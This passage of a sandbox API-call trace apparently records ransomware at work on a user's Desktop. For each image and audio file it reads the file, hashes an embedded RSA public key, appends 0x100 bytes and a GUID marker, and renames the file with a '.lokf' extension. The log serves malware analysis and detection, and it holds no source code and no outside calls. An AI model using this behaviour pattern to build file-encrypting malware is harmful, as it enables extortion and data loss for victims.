halpmcxz\\desktop\\fhecmqmumugofo.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FhecmqmUmuGofO.jpg.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fhecmqmumugofo.jpg.lokf")) returned 1 [0058.563] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.563] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.563] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.564] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0058.564] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6564ae30, ftCreationTime.dwHighDateTime=0x1d4c674, ftLastAccessTime.dwLowDateTime=0x4d1e2720, ftLastAccessTime.dwHighDateTime=0x1d4c534, ftLastWriteTime.dwLowDateTime=0x4d1e2720, ftLastWriteTime.dwHighDateTime=0x1d4c534, nFileSizeHigh=0x0, nFileSizeLow=0xf50d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FqC7oKr9X-T-xlLzFbdd.jpg", cAlternateFileName="FQC7OK~1.JPG")) returned 1 [0058.564] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FqC7oKr9X-T-xlLzFbdd.jpg") returned=".jpg" [0058.564] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FqC7oKr9X-T-xlLzFbdd.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fqc7okr9x-t-xllzfbdd.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.564] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=62733) returned 1 [0058.564] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.566] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xf4e7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.567] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.567] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xf50d, lpOverlapped=0x0) returned 1 [0058.568] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.568] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.568] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.568] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.568] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.568] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.568] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.569] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.569] GetLastError () returned 0x0 [0058.569] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.569] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.569] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.569] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.569] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xf510) returned 0x9c82710 [0058.569] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0058.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0058.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298e30 [0058.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6aea8 [0058.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298e78 [0058.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6aec0 [0058.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6aef0 [0058.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6af08 [0058.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0058.570] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aef0 | out: hHeap=0x660000) returned 1 [0058.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af08 | out: hHeap=0x660000) returned 1 [0058.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0058.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6af08 [0058.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0058.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6aef0 [0058.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0058.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0058.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af08 | out: hHeap=0x660000) returned 1 [0058.571] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xf50d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.571] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.571] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.571] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.571] CloseHandle (hObject=0x5cc) returned 1 [0058.572] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.572] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.572] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FqC7oKr9X-T-xlLzFbdd.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fqc7okr9x-t-xllzfbdd.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FqC7oKr9X-T-xlLzFbdd.jpg.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fqc7okr9x-t-xllzfbdd.jpg.lokf")) returned 1 [0058.573] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c601c50, ftCreationTime.dwHighDateTime=0x1d4d53c, ftLastAccessTime.dwLowDateTime=0xb3f380, ftLastAccessTime.dwHighDateTime=0x1d4c69f, ftLastWriteTime.dwLowDateTime=0xb3f380, ftLastWriteTime.dwHighDateTime=0x1d4c69f, nFileSizeHigh=0x0, nFileSizeLow=0xb9d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gRPeD.m4a", cAlternateFileName="")) returned 1 [0058.573] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.573] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.573] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gRPeD.m4a") returned=".m4a" [0058.573] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gRPeD.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\grped.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.573] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=47572) returned 1 [0058.573] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.576] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb9ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.576] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.576] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.576] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xb9d4, lpOverlapped=0x0) returned 1 [0058.577] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.577] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.577] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.577] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.577] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.577] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.577] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.578] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.578] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.578] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.578] GetLastError () returned 0x0 [0058.578] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.578] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.578] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.578] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.578] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.578] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.578] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.578] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.578] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb9d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.578] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.579] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.579] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.579] CloseHandle (hObject=0x5cc) returned 1 [0058.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0058.580] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gRPeD.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\grped.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gRPeD.m4a.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\grped.m4a.lokf")) returned 1 [0058.581] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf479ec30, ftCreationTime.dwHighDateTime=0x1d4c998, ftLastAccessTime.dwLowDateTime=0x28ff8720, ftLastAccessTime.dwHighDateTime=0x1d4d06b, ftLastWriteTime.dwLowDateTime=0x28ff8720, ftLastWriteTime.dwHighDateTime=0x1d4d06b, nFileSizeHigh=0x0, nFileSizeLow=0x12200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H 5zj6wBswdjjTMij-.mp3", cAlternateFileName="H5ZJ6W~1.MP3")) returned 1 [0058.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.581] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H 5zj6wBswdjjTMij-.mp3") returned=".mp3" [0058.581] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H 5zj6wBswdjjTMij-.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h 5zj6wbswdjjtmij-.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.581] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=74240) returned 1 [0058.581] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.583] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x121da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.583] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.584] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.584] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x12200, lpOverlapped=0x0) returned 1 [0058.585] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.585] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.585] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.585] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.585] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.585] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.585] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.585] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.585] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.585] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | 